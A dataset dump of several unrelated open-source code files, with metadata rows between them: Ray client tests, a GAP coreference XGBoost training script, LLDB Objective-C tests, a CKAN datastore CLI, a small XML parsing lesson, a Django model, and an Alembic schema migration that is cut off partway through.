def test_client_gpu_ids(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with enable_client_mode():
# No client connection.
with pytest.raises(Exception) as e:
ray.get_gpu_ids()
assert str(e.value) == "Ray Client is not connected."\
" Please connect by calling `ray.init`."
with ray_start_client_server():
# Now have a client connection.
assert ray.get_gpu_ids() == []
def test_client_serialize_addon(call_ray_stop_only):
import ray
import pydantic
ray.init(num_cpus=0)
class User(pydantic.BaseModel):
name: str
with ray_start_client_server() as ray:
assert ray.get(ray.put(User(name="ray"))).name == "ray"
object_ref_cleanup_script = """
import ray
ray.init("ray://localhost:50051")
@ray.remote
def f():
return 42
@ray.remote
class SomeClass:
pass
obj_ref = f.remote()
actor_ref = SomeClass.remote()
"""
def test_object_ref_cleanup():
    # Checks no error output when running the script in
    # object_ref_cleanup_script
    # See https://github.com/ray-project/ray/issues/17968 for details
    with ray_start_client_server():
        result = run_string_as_driver(object_ref_cleanup_script)
        # Dangling refs at interpreter shutdown used to produce these
        # messages on stderr; their absence means cleanup is orderly.
        assert "Error in sys.excepthook:" not in result
        assert "AttributeError: 'NoneType' object has no " not in result
        assert "Exception ignored in" not in result
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25552 --port 0"],
    indirect=True)
def test_wrapped_actor_creation(call_ray_start):
    """
    When the client schedules an actor, the server will load a separate
    copy of the actor class if it's defined in a separate file. This
    means that modifications to the client's copy of the actor class
    aren't propagated to the server. Currently, tracing logic modifies
    the signatures of actor methods to pass around metadata when ray.remote
    is applied to an actor class. However, if a user does something like:

    class SomeActor:
        def __init__(self):
            pass

    def decorate_actor():
        RemoteActor = ray.remote(SomeActor)
        ...

    Then the SomeActor class will have its signatures modified on the client
    side, but not on the server side, since ray.remote was applied inside of
    the function instead of directly on the actor. Note if it were directly
    applied to the actor then the signature would be modified when the server
    imports the class.
    """
    import ray
    ray.init("ray://localhost:25552")
    # The helper lives in another module, so the server imports its own copy.
    run_wrapped_actor_creation()
@pytest.mark.parametrize(
    "call_ray_start",
    ["ray start --head --ray-client-server-port 25553 --num-cpus 0"],
    indirect=True)
@pytest.mark.parametrize("use_client", [True, False])
def test_init_requires_no_resources(call_ray_start, use_client):
    """A num_cpus=0 task must be schedulable on a zero-CPU cluster, both
    when connecting directly and when connecting via the Ray client.

    Bug fix: the branches were inverted -- the ``use_client=True`` case
    previously connected via the plain cluster address while the direct
    case used the ``ray://`` client URL.
    """
    import ray
    if use_client:
        # Connect through the Ray client server started by the fixture.
        ray.init("ray://localhost:25553")
    else:
        # Connect directly to the cluster address returned by the fixture.
        address = call_ray_start
        ray.init(address)

    @ray.remote(num_cpus=0)
    def f():
        pass

    ray.get(f.remote())
# Allow running this test module directly with the same semantics as pytest.
if __name__ == "__main__":
    sys.exit(pytest.main(["-v", __file__]))
| 31.286452
| 80
| 0.615829
|
4a04dc1e0162362683e5c9012f085d2067199f21
| 10,309
|
py
|
Python
|
models/true_or_false_model.py
|
katsugeneration/gap-conf-kaggle
|
6c91b40a0f7dd30b24cbc3cbab664d187540e159
|
[
"MIT"
] | null | null | null |
models/true_or_false_model.py
|
katsugeneration/gap-conf-kaggle
|
6c91b40a0f7dd30b24cbc3cbab664d187540e159
|
[
"MIT"
] | null | null | null |
models/true_or_false_model.py
|
katsugeneration/gap-conf-kaggle
|
6c91b40a0f7dd30b24cbc3cbab664d187540e159
|
[
"MIT"
] | null | null | null |
import pandas
import utils
import pickle
import numpy as np
from sklearn.metrics import accuracy_score, log_loss
import optuna
import xgboost as xgb
from models import stanfordnlp_model
dtype = np.int32
DEFAULT_NGRAM_WINDOW = 2
DEFAULT_WINDOW_SIZE = 10
NONE_DEPENDENCY = 'NONE'
def _load_data(df, use_preprocessdata=False, save_path=None):
    """Load (or build and cache) task-specific preprocessed data.

    Args:
        df (DataFrame): source pandas DataFrame with 'Text', mention and
            offset columns in GAP format.
        use_preprocessdata (bool): whether to try loading the local cache
            at ``save_path`` first.
        save_path (str): local pickle cache file path.

    Returns:
        data (List[tuple]): per-row tuples
            ``(sentence_words, [pronoun_index, A_index, B_index])``.
    """
    if use_preprocessdata:
        try:
            with open(save_path, 'rb') as f:
                data = pickle.load(f)
        # Bug fix: was a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt. Any ordinary failure (missing or
        # corrupt cache) just falls through to a rebuild.
        except Exception:
            use_preprocessdata = False
    if not use_preprocessdata:
        data = []
        for i in range(len(df)):
            # Convert character offsets to word indexes; the tokenization
            # from the first call is reused for the other two mentions.
            words, pronnoun_index = utils.charpos_to_word_index(
                df['Text'][i], df['Pronoun-offset'][i],
                df['Pronoun'][i].split()[0])
            _, A_index = utils.charpos_to_word_index(
                df['Text'][i], df['A-offset'][i], df['A'][i].split()[0],
                words=words)
            _, B_index = utils.charpos_to_word_index(
                df['Text'][i], df['B-offset'][i], df['B'][i].split()[0],
                words=words)
            data.append((words, [pronnoun_index, A_index, B_index]))
        # Cache the rebuilt data for the next run.
        with open(save_path, 'wb') as f:
            pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)
    print("Data Loaded")
    return data
def _get_classify_labels(df):
"""Return task classify label
format is following.
data1 A is True or not
...
data1 B is True or not
...
Args:
df (DataFram): pandas DataFrame object
Return:
labels (array): label values. type of numpy int32 array. shaep is (2*N, 1)
"""
labels_A = np.zeros((len(df), 1), dtype=dtype)
labels_A[df['A-coref']] = 1
labels_B = np.zeros((len(df), 1), dtype=dtype)
labels_B[df['B-coref']] = 1
labels = np.concatenate([labels_A, labels_B])
return labels
def _preprocess_data(df, use_preprocessdata=False, save_path=None):
    """Build the feature matrix and labels for the task.

    Args:
        df (DataFrame): target pandas DataFrame object.
        use_preprocessdata (bool): whether or not to use local preprocess file loading
        save_path (str): local preprocess file path

    Returns:
        X (array): explanatory variables; shape is (2*n_samples, n_features).
            The first half of the rows are features for candidate A, the
            second half for candidate B (matching _get_classify_labels).
        Y (array): objective variables; shape is (2*n_samples, 1).
    """
    data = _load_data(df, use_preprocessdata, save_path)
    X = []
    X2 = []
    for i, (words, indexes) in enumerate(data):
        # Positional bag-of-POS features around each of the three mentions.
        X.append(
            stanfordnlp_model._vectorise_bag_of_pos_with_position(
                words, indexes, DEFAULT_WINDOW_SIZE,
                targets=[df['Pronoun'][i], df['A'][i], df['B'][i]]))
        # Dependency-tree bag-of-POS features for the same mentions.
        X2.append(stanfordnlp_model._vectorise_bag_of_pos_with_dependency(words, indexes))
    X = np.array(X)
    X2 = np.array(X2)
    # Each feature vector concatenates [pronoun, A, B] parts of equal
    # length; split into thirds to recover the per-mention slices.
    featur_len = int(X.shape[1] / 3)
    featur_len2 = int(X2.shape[1] / 3)
    X_pr = X[:, 0:featur_len]
    X_a = X[:, featur_len:featur_len*2]
    X_b = X[:, featur_len*2:featur_len*3]
    X2_pr = X2[:, 0:featur_len2]
    X2_a = X2[:, featur_len2:featur_len2*2]
    X2_b = X2[:, featur_len2*2:featur_len2*3]
    # Per-candidate features: raw parts, pairwise interactions (difference
    # and elementwise product) with the pronoun part, gender labels, and
    # the character distance between pronoun and candidate.
    X_A = np.concatenate((
        X_pr,
        X_a,
        X2_pr,
        X2_a,
        X_pr - X_a,
        X_pr * X_a,
        X2_pr - X2_a,
        X2_pr * X2_a,
        stanfordnlp_model._get_sexial_labels(df),
        (df['Pronoun-offset'] - df['A-offset']).values.reshape(len(X), 1)), axis=1)
    X_B = np.concatenate((
        X_pr,
        X_b,
        X2_pr,
        X2_b,
        X_pr - X_b,
        X_pr * X_b,
        X2_pr - X2_b,
        X2_pr * X2_b,
        stanfordnlp_model._get_sexial_labels(df),
        (df['Pronoun-offset'] - df['B-offset']).values.reshape(len(X), 1)), axis=1)
    # Stack A rows above B rows to align with _get_classify_labels output.
    X = np.concatenate((X_A, X_B))
    Y = _get_classify_labels(df)
    return X, Y
def calculate_rate(y_pred):
    """Convert stacked per-mention probabilities into one categorical
    distribution per example.

    Column 0 is the likelihood that A is the antecedent, column 1 that B
    is, and column 2 that neither is. Rows are normalized to sum to 1.

    Args:
        y_pred (array): either a 1-D array of positive-class probabilities
            or a 2-D predict_proba output (the second column is used). The
            first half of the entries are the A predictions, the second
            half the B predictions.

    Returns:
        array: numpy array of shape (N, 3).
    """
    if y_pred.ndim == 2:
        # Keep only the positive-class column of predict_proba output.
        y_pred = y_pred[:, 1]
    half = len(y_pred) // 2
    prob_a = y_pred[:half].reshape(half, 1)
    prob_b = y_pred[half:].reshape(half, 1)
    # "Neither" is modeled as both candidates being negative.
    neither = (1 - prob_a) * (1 - prob_b)
    combined = np.concatenate([prob_a, prob_b, neither], axis=1)
    return combined / np.sum(combined, axis=1, keepdims=True)
def train(use_preprocessdata=True):
    """Tune, train and persist the XGBoost classifier.

    Runs an Optuna hyper-parameter search scored by log-loss on the
    validation split, refits the best model on train+validation, pickles
    it to 'model.pkl', and prints the training accuracy.

    Args:
        use_preprocessdata (bool): whether to reuse the cached
            preprocessing pickles for the train/validation splits.
    """
    df = pandas.read_csv('dataset/gap-test.tsv', sep='\t')
    X, Y = _preprocess_data(df, use_preprocessdata=use_preprocessdata, save_path='preprocess_traindata.pkl')
    Y_labels = stanfordnlp_model._get_classify_labels(df)
    validation_df = pandas.read_csv('dataset/gap-validation.tsv', sep='\t')
    validation_X, validation_Y = _preprocess_data(validation_df, use_preprocessdata=use_preprocessdata, save_path='preprocess_valdata.pkl')
    validation_Y_labels = stanfordnlp_model._get_classify_labels(validation_df)

    def objective(trial):
        # One Optuna trial: sample hyper-parameters, fit, and return the
        # validation log-loss of the 3-way categorical prediction.
        eta = trial.suggest_loguniform('eta', 0.001, 0.1)
        max_depth = trial.suggest_int('max_depth', 3, 25)
        gamma = trial.suggest_loguniform('gamma', 0.05, 1.0)
        min_child_weight = trial.suggest_int('min_child_weight', 1, 7)
        subsample = trial.suggest_discrete_uniform('subsample', 0.6, 1.0, 0.1)
        colsample_bytree = trial.suggest_discrete_uniform('colsample_bytree', 0.6, 1.0, 0.1)
        model = xgb.XGBClassifier(
            max_depth=max_depth,
            eta=eta,
            gamma=gamma,
            min_child_weight=min_child_weight,
            subsample=subsample,
            colsample_bytree=colsample_bytree,
            n_jobs=1,
            random_state=0)

        def _log_loss(y_pred, y):
            """For XGBoost logloss calculator."""
            # Score the derived 3-way distribution, not the raw binary one.
            y_pred = calculate_rate(y_pred)
            return 'logloss', log_loss(validation_Y_labels, y_pred)

        # Let Optuna prune unpromising trials from the eval-set logloss.
        pruning_callback = optuna.integration.XGBoostPruningCallback(trial, 'validation_0-logloss')
        model.fit(
            X,
            Y.flatten(),
            eval_set=[(validation_X, validation_Y.flatten())],
            eval_metric=_log_loss,
            callbacks=[pruning_callback],
            verbose=False)
        return log_loss(validation_Y_labels, calculate_rate(model.predict_proba(validation_X)))

    study = optuna.create_study(
        study_name='gap-conf-kaggle',
        pruner=optuna.pruners.MedianPruner(),
        sampler=optuna.samplers.TPESampler(seed=0))
    study.optimize(objective, n_trials=100, n_jobs=-1)
    print("Best Params", study.best_params)
    print("Best Validation Value", study.best_value)
    # Refit on the combined train+validation data with the best params.
    model = xgb.XGBClassifier(n_jobs=-1, random_state=0, **study.best_params)
    model.fit(
        np.concatenate([X, validation_X]),
        np.concatenate([Y, validation_Y]).flatten())
    with open('model.pkl', 'wb') as f:
        pickle.dump(model, f, protocol=pickle.HIGHEST_PROTOCOL)
    y_pred = calculate_rate(model.predict_proba(X))
    print("Train Accuracy:", accuracy_score(Y_labels, np.argmax(y_pred, axis=1)))
def evaluate(test_data, use_preprocessdata=True):
    """Train, then score the trained model on test_data.

    Prints accuracy plus diagnostics for mis-classified examples among
    the first 20 rows and per-class error counts (class 0 = A,
    1 = B, 2 = neither).

    Args:
        test_data (DataFrame): GAP-format test DataFrame.
        use_preprocessdata (bool): whether to reuse the cached test
            preprocessing pickle.

    Returns:
        DataFrame: per-example probabilities with columns
        ['A', 'B', 'NEITHER'] plus the original 'ID'.
    """
    train()
    X, Y = _preprocess_data(test_data, use_preprocessdata=use_preprocessdata, save_path='preprocess_testdata.pkl')
    Y_labels = stanfordnlp_model._get_classify_labels(test_data)
    with open('model.pkl', 'rb') as f:
        model = pickle.load(f)
    pred = model.predict_proba(X)
    y_pred = calculate_rate(pred)
    print("Test Accuracy:", accuracy_score(Y_labels, np.argmax(y_pred, axis=1)))
    # Boolean mask of wrong predictions among the first 20 examples.
    a = (Y_labels.flatten()[:20] != np.argmax(y_pred[:20], axis=1))
    print("Error A count", len(Y_labels[Y_labels.flatten() == 0]), len(Y_labels[Y_labels.flatten() == 0][(Y_labels[Y_labels.flatten() == 0].flatten() != np.argmax(y_pred[Y_labels.flatten() == 0], axis=1))]))
    print("Error B count", len(Y_labels[Y_labels.flatten() == 1]), len(Y_labels[Y_labels.flatten() == 1][Y_labels[Y_labels.flatten() == 1].flatten() != np.argmax(y_pred[Y_labels.flatten() == 1], axis=1)]))
    print("Error Pronnoun count", len(Y_labels[Y_labels.flatten() == 2]), len(Y_labels[Y_labels.flatten() == 2][Y_labels[Y_labels.flatten() == 2].flatten() != np.argmax(y_pred[Y_labels.flatten() == 2], axis=1)]))
    print("Error Case", Y_labels[:20][a])
    print("Error Case Label", np.argmax(y_pred[:20][a], axis=1))
    print("Error Case Rate", y_pred[:20][a])
    print("A predictions", pred[:20][a])
    print("B predictions", pred[int(len(pred)/2):int(len(pred)/2)+20][a])
    # Dump the POS/dependency features for each mis-classified example.
    data = _load_data(test_data, True, 'preprocess_testdata.pkl')
    for i, (words, indexes) in enumerate(data):
        if i in np.where(a == True)[0]:
            print("Index", i)
            print("Pronounce position", stanfordnlp_model._get_bag_of_pos_with_position(words, indexes[0], DEFAULT_WINDOW_SIZE, target_len=len(test_data['Pronoun'][i].split())))
            print("A position", stanfordnlp_model._get_bag_of_pos_with_position(words, indexes[1], DEFAULT_WINDOW_SIZE, target_len=len(test_data['A'][i].split())))
            print("B position", stanfordnlp_model._get_bag_of_pos_with_position(words, indexes[2], DEFAULT_WINDOW_SIZE, target_len=len(test_data['B'][i].split())))
            print("Pronounce dependency", stanfordnlp_model._get_bag_of_pos_with_dependency(words, indexes[0]))
            print("A dependency", stanfordnlp_model._get_bag_of_pos_with_dependency(words, indexes[1]))
            print("B dependency", stanfordnlp_model._get_bag_of_pos_with_dependency(words, indexes[2]))
    predicts = calculate_rate(model.predict_proba(X))
    out_df = pandas.DataFrame(data=predicts, columns=['A', 'B', 'NEITHER'])
    out_df['ID'] = test_data['ID']
    return out_df
| 42.077551
| 212
| 0.644097
|
4a04de3340f24a7c515854fa5b96aeedb23f74c8
| 1,871
|
py
|
Python
|
lldb/test/API/lang/objc/foundation/TestObjCMethodsNSError.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 2,338
|
2018-06-19T17:34:51.000Z
|
2022-03-31T11:00:37.000Z
|
lldb/test/API/lang/objc/foundation/TestObjCMethodsNSError.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 3,740
|
2019-01-23T15:36:48.000Z
|
2022-03-31T22:01:13.000Z
|
lldb/test/API/lang/objc/foundation/TestObjCMethodsNSError.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 500
|
2019-01-23T07:49:22.000Z
|
2022-03-30T02:59:37.000Z
|
"""
Test more expression command sequences with objective-c.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class FoundationTestCaseNSError(TestBase):
    """Expression-command tests that exercise the Objective-C runtime
    through NSString and NSError."""

    mydir = TestBase.compute_mydir(__file__)

    @expectedFailureAll(archs=["i[3-6]86"], bugnumber="<rdar://problem/28814052>")
    def test_runtime_types(self):
        """Test commands that require runtime types"""
        self.build()
        self.target, process, thread, bkpt = lldbutil.run_to_source_breakpoint(
            self, '// Break here for NSString tests',
            lldb.SBFileSpec('main.m', False))
        # Test_NSString:
        self.runCmd("thread backtrace")
        self.expect("expression [str length]",
                    patterns=["\(NSUInteger\) \$.* ="])
        self.expect("expression str.length")
        self.expect('expression str = [NSString stringWithCString: "new"]')
        # `po` on a constructed NSError must print domain, code and
        # description as resolved by the runtime.
        self.expect(
            'po [NSError errorWithDomain:@"Hello" code:35 userInfo:@{@"NSDescription" : @"be completed."}]',
            substrs=[
                "Error Domain=Hello",
                "Code=35",
                "be completed."])
        self.runCmd("process continue")

    @expectedFailureAll(archs=["i[3-6]86"], bugnumber="<rdar://problem/28814052>")
    def test_NSError_p(self):
        """Test that p of the result of an unknown method does require a cast."""
        self.build()
        self.target, process, thread, bkpt = lldbutil.run_to_source_breakpoint(
            self, '// Set break point at this line',
            lldb.SBFileSpec('main.m', False))
        # Sending an unimplemented selector should produce the "cast the
        # message send" diagnostic rather than a value.
        self.expect("p [NSError thisMethodIsntImplemented:0]", error=True, patterns=[
            "no known method", "cast the message send to the method's return type"])
        self.runCmd("process continue")
| 38.183673
| 108
| 0.618386
|
4a04de881bbf71126f3dfd62a2c7df73418d8a33
| 5,446
|
py
|
Python
|
ckanext/datastore/cli.py
|
mabah-mst/ckan
|
105f613272c2e31daa0081ead24c678bf1b55c22
|
[
"Apache-2.0"
] | 2
|
2017-05-15T08:16:49.000Z
|
2019-05-30T23:53:39.000Z
|
ckanext/datastore/cli.py
|
mabah-mst/ckan
|
105f613272c2e31daa0081ead24c678bf1b55c22
|
[
"Apache-2.0"
] | 1
|
2021-05-13T11:24:02.000Z
|
2021-05-13T11:24:02.000Z
|
ckanext/datastore/cli.py
|
cascaoSDC/ckan
|
75a08caa7c688ce70229dfea7070cc667a15c5e8
|
[
"BSD-3-Clause"
] | 4
|
2018-10-08T12:05:16.000Z
|
2021-11-24T16:18:52.000Z
|
# encoding: utf-8
import logging
import os
import click
from ckan.model import parse_db_config
from ckan.common import config
import ckan.logic as logic
import ckanext.datastore as datastore_module
from ckanext.datastore.backend.postgres import identifier
from ckanext.datastore.blueprint import DUMP_FORMATS, dump_to
log = logging.getLogger(__name__)
@click.group()
def datastore():
    u'''Perform commands to set up the datastore.
    '''
    # Group container only; subcommands are registered below via
    # @datastore.command().
@datastore.command(
    u'set-permissions',
    short_help=u'Generate SQL for permission configuration.'
)
def set_permissions():
    u'''Emit an SQL script that will set the permissions for the datastore
    users as configured in your configuration file.'''
    write_url = _parse_db_config(u'ckan.datastore.write_url')
    read_url = _parse_db_config(u'ckan.datastore.read_url')
    db_url = _parse_db_config(u'sqlalchemy.url')

    # Basic validation that read and write URLs reference the same database.
    # This obviously doesn't check they're the same database (the hosts/ports
    # could be different), but it's better than nothing, I guess.
    if write_url[u'db_name'] != read_url[u'db_name']:
        click.secho(
            u'The datastore write_url and read_url must refer to the same '
            u'database!',
            fg=u'red',
            bold=True
        )
        raise click.Abort()

    # Render the bundled SQL template with quoted identifiers and print it.
    sql = permissions_sql(
        maindb=db_url[u'db_name'],
        datastoredb=write_url[u'db_name'],
        mainuser=db_url[u'db_user'],
        writeuser=write_url[u'db_user'],
        readuser=read_url[u'db_user']
    )
    click.echo(sql)
def permissions_sql(maindb, datastoredb, mainuser, writeuser, readuser):
    """Render the bundled ``set_permissions.sql`` template.

    Database and role names are passed through ``identifier`` so they are
    safely quoted before substitution into the template.
    """
    template_path = os.path.join(
        os.path.dirname(datastore_module.__file__), u'set_permissions.sql'
    )
    with open(template_path) as template_file:
        sql_template = template_file.read()
    substitutions = {
        u'maindb': identifier(maindb),
        u'datastoredb': identifier(datastoredb),
        u'mainuser': identifier(mainuser),
        u'writeuser': identifier(writeuser),
        u'readuser': identifier(readuser),
    }
    return sql_template.format(**substitutions)
@datastore.command()
@click.argument(u'resource-id', nargs=1)
@click.argument(
    u'output-file',
    type=click.File(u'wb'),
    default=click.get_binary_stream(u'stdout')
)
@click.option(u'--format', default=u'csv', type=click.Choice(DUMP_FORMATS))
@click.option(u'--offset', type=click.IntRange(0, None), default=0)
@click.option(u'--limit', type=click.IntRange(0))
@click.option(u'--bom', is_flag=True)  # FIXME: options based on format
@click.pass_context
def dump(ctx, resource_id, output_file, format, offset, limit, bom):
    u'''Dump a datastore resource.
    '''
    # dump_to streams through Flask machinery, so it needs a request
    # context even when run from the CLI; fake one here.
    flask_app = ctx.meta['flask_app']
    with flask_app.test_request_context():
        dump_to(
            resource_id,
            output_file,
            fmt=format,
            offset=offset,
            limit=limit,
            options={u'bom': bom},
            sort=u'_id',
            search_params={}
        )
def _parse_db_config(config_key=u'sqlalchemy.url'):
    """Parse the DB connection URL stored under config_key into its parts,
    aborting the CLI with a red error message when parsing fails."""
    db_config = parse_db_config(config_key)
    if not db_config:
        click.secho(
            u'Could not extract db details from url: %r' % config[config_key],
            fg=u'red',
            bold=True
        )
        raise click.Abort()
    return db_config
@datastore.command(
    u'purge',
    short_help=u'purge orphaned resources from the datastore.'
)
def purge():
    u'''Purge orphaned resources from the datastore using the datastore_delete
    action, which drops tables when called without filters.'''
    site_user = logic.get_action(u'get_site_user')({u'ignore_auth': True}, {})
    context = {u'user': site_user[u'name']}

    result = logic.get_action(u'datastore_search')(
        context,
        {u'resource_id': u'_table_metadata'}
    )

    resource_id_list = []
    for record in result[u'records']:
        try:
            # ignore 'alias' records (views) as they are automatically
            # deleted when the parent resource table is dropped
            if record[u'alias_of']:
                continue

            # we need to do this to trigger resource_show auth function
            site_user = logic.get_action(u'get_site_user')(
                {u'ignore_auth': True}, {})
            context = {u'user': site_user[u'name']}
            logic.get_action(u'resource_show')(
                context,
                {u'id': record[u'name']}
            )
        except logic.NotFound:
            # No matching CKAN resource: the datastore table is orphaned.
            resource_id_list.append(record[u'name'])
            click.echo(u"Resource '%s' orphaned - queued for drop" %
                       record[u'name'])
        except KeyError:
            continue

    orphaned_table_count = len(resource_id_list)
    click.echo(u'%d orphaned tables found.' % orphaned_table_count)

    if not orphaned_table_count:
        return

    click.confirm(u'Proceed with purge?', abort=True)

    # Drop the orphaned datastore tables. When datastore_delete is called
    # without filters, it does a drop table cascade
    drop_count = 0
    for resource_id in resource_id_list:
        logic.get_action(u'datastore_delete')(
            context,
            {u'resource_id': resource_id, u'force': True}
        )
        # Bug fix: message previously ended with a stray ')'.
        click.echo(u"Table '%s' dropped" % resource_id)
        drop_count += 1
    click.echo(u'Dropped %s tables' % drop_count)
def get_commands():
    """Return the click commands this module contributes to the CLI."""
    return (set_permissions, dump, purge)
| 30.088398
| 78
| 0.643959
|
4a04e22adafbd1373a9d9fc82325fd3d15005b8b
| 647
|
py
|
Python
|
Lesson 13.gf/xml_Leader2.py
|
gfoo003/programming-together
|
225e0a2255dd8da1f1ef32d2a88deea27c050f10
|
[
"MIT"
] | null | null | null |
Lesson 13.gf/xml_Leader2.py
|
gfoo003/programming-together
|
225e0a2255dd8da1f1ef32d2a88deea27c050f10
|
[
"MIT"
] | null | null | null |
Lesson 13.gf/xml_Leader2.py
|
gfoo003/programming-together
|
225e0a2255dd8da1f1ef32d2a88deea27c050f10
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as ET

# Sample document: two <user> records nested under <stuff>/<users>.
xml_string = '''
<stuff>
    <users>
        <user x = "2">
            <id>001</id>
            <name>Chuck</name>
        </user>
        <user x = "7">
            <id>007</id>
            <name>Brent</name>
        </user>
    </users>
</stuff>
'''

# fromstring() returns the root element (<stuff>); paths below are
# relative to it, so the root tag itself is never named again.
root_stuff = ET.fromstring(xml_string)

# Collect every <user> element with a relative path query.
user_elements = root_stuff.findall('users/user')
print ('user count:', len(user_elements))

for user in user_elements:
    child_name = user.find('name')
    child_id = user.find('id')
    print('name:', child_name.text)
    print('id:', child_id.text)
    # XML attributes are read with Element.get(), not find().
    print('attribute(x):', user.get('x'))
| 23.107143
| 48
| 0.565688
|
4a04e26d0887bc85a21fc7afaeec298a95c56f0b
| 415
|
py
|
Python
|
basic/publishers/models.py
|
rmolinamir/Django-App
|
b1e7eac22caa0010ac2a592ee7edb829f6eeb95a
|
[
"MIT"
] | null | null | null |
basic/publishers/models.py
|
rmolinamir/Django-App
|
b1e7eac22caa0010ac2a592ee7edb829f6eeb95a
|
[
"MIT"
] | 7
|
2020-02-12T03:21:09.000Z
|
2022-02-10T09:04:52.000Z
|
basic/publishers/models.py
|
rmolinamir/Django-App
|
b1e7eac22caa0010ac2a592ee7edb829f6eeb95a
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import BaseUserManager
class Publisher(models.Model):
    """
    Schema for publisher instances.
    """
    # Publisher display name; required at the database level (null=False).
    name = models.TextField(null=False)
    # Hidden from forms (editable=False).
    # NOTE(review): auto_now=True refreshes this date on *every* save;
    # for a creation timestamp auto_now_add=True was probably intended --
    # confirm before changing, as it alters persisted behavior.
    created_at = models.DateField(editable=False, auto_now=True)
    # NOTE(review): BaseUserManager is designed for user models; a plain
    # models.Manager would normally suffice here -- confirm intent.
    objects = BaseUserManager()

    def __str__(self):
        """Return string representation of our publisher"""
        return self.name
| 25.9375
| 64
| 0.703614
|
4a04e350f4222ba29bc0dff4fb87e51d56ba0603
| 6,816
|
py
|
Python
|
migrations/versions/d6c0f2c3dfbe_.py
|
EandrewJones/srdp-database
|
22b9f5bcbffcd14b17cd62c6b268e5be079bf4fe
|
[
"MIT"
] | null | null | null |
migrations/versions/d6c0f2c3dfbe_.py
|
EandrewJones/srdp-database
|
22b9f5bcbffcd14b17cd62c6b268e5be079bf4fe
|
[
"MIT"
] | null | null | null |
migrations/versions/d6c0f2c3dfbe_.py
|
EandrewJones/srdp-database
|
22b9f5bcbffcd14b17cd62c6b268e5be079bf4fe
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: d6c0f2c3dfbe
Revises:
Create Date: 2022-04-11 21:19:57.276686
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd6c0f2c3dfbe'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial schema: groups, user, organizations, and the
    per-organization violence/nonviolence event tables, with their
    created_at/modified_at indexes."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('groups',
        sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('kgcId', sa.Integer(), nullable=False),
        sa.Column('groupName', sa.String(length=255), nullable=False),
        sa.Column('country', sa.String(length=255), nullable=False),
        sa.Column('startYear', sa.Integer(), nullable=True),
        sa.Column('endYear', sa.Integer(), nullable=True),
        sa.PrimaryKeyConstraint('kgcId')
    )
    op.create_index(op.f('ix_groups_groupName'), 'groups', ['groupName'], unique=False)
    op.create_index(op.f('ix_groups_created_at'), 'groups', ['created_at'], unique=False)
    op.create_index(op.f('ix_groups_modified_at'), 'groups', ['modified_at'], unique=False)
    op.create_table('user',
        sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('username', sa.String(length=64), nullable=True),
        sa.Column('email', sa.String(length=120), nullable=True),
        sa.Column('name', sa.String(length=120), nullable=True),
        sa.Column('password_hash', sa.String(length=128), nullable=True),
        sa.Column('token', sa.String(length=32), nullable=True),
        sa.Column('token_expiration', sa.DateTime(), nullable=True),
        sa.Column('is_admin', sa.Boolean(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('email'),
        sa.UniqueConstraint('username')
    )
    op.create_index(op.f('ix_user_created_at'), 'user', ['created_at'], unique=False)
    op.create_index(op.f('ix_user_modified_at'), 'user', ['modified_at'], unique=False)
    op.create_index(op.f('ix_user_name'), 'user', ['name'], unique=False)
    op.create_index(op.f('ix_user_token'), 'user', ['token'], unique=True)
    # organizations references groups via kgcId, so groups must exist first.
    op.create_table('organizations',
        sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('facId', sa.Integer(), nullable=False),
        sa.Column('kgcId', sa.Integer(), nullable=True),
        sa.Column('facName', sa.String(length=767), nullable=False),
        sa.Column('startYear', sa.Integer(), nullable=True),
        sa.Column('endYear', sa.Integer(), nullable=True),
        sa.ForeignKeyConstraint(['kgcId'], ['groups.kgcId'], ),
        sa.PrimaryKeyConstraint('facId'),
        sa.UniqueConstraint('facId')
    )
    op.create_index(op.f('ix_organizations_created_at'), 'organizations', ['created_at'], unique=False)
    op.create_index(op.f('ix_organizations_modified_at'), 'organizations', ['modified_at'], unique=False)
    # Event tables reference organizations via facId.
    op.create_table('nonviolence',
        sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('facId', sa.Integer(), nullable=True),
        sa.Column('year', sa.Integer(), nullable=True),
        sa.Column('economicNoncooperation', sa.Integer(), nullable=False),
        sa.Column('protestDemonstration', sa.Integer(), nullable=False),
        sa.Column('nonviolentIntervention', sa.Integer(), nullable=False),
        sa.Column('socialNoncooperation', sa.Integer(), nullable=False),
        sa.Column('institutionalAction', sa.Integer(), nullable=False),
        sa.Column('politicalNoncooperation', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['facId'], ['organizations.facId'], ),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_nonviolence_facId'), 'nonviolence', ['facId'], unique=False)
    op.create_index(op.f('ix_nonviolence_created_at'), 'nonviolence', ['created_at'], unique=False)
    op.create_index(op.f('ix_nonviolence_modified_at'), 'nonviolence', ['modified_at'], unique=False)
    op.create_table('violence',
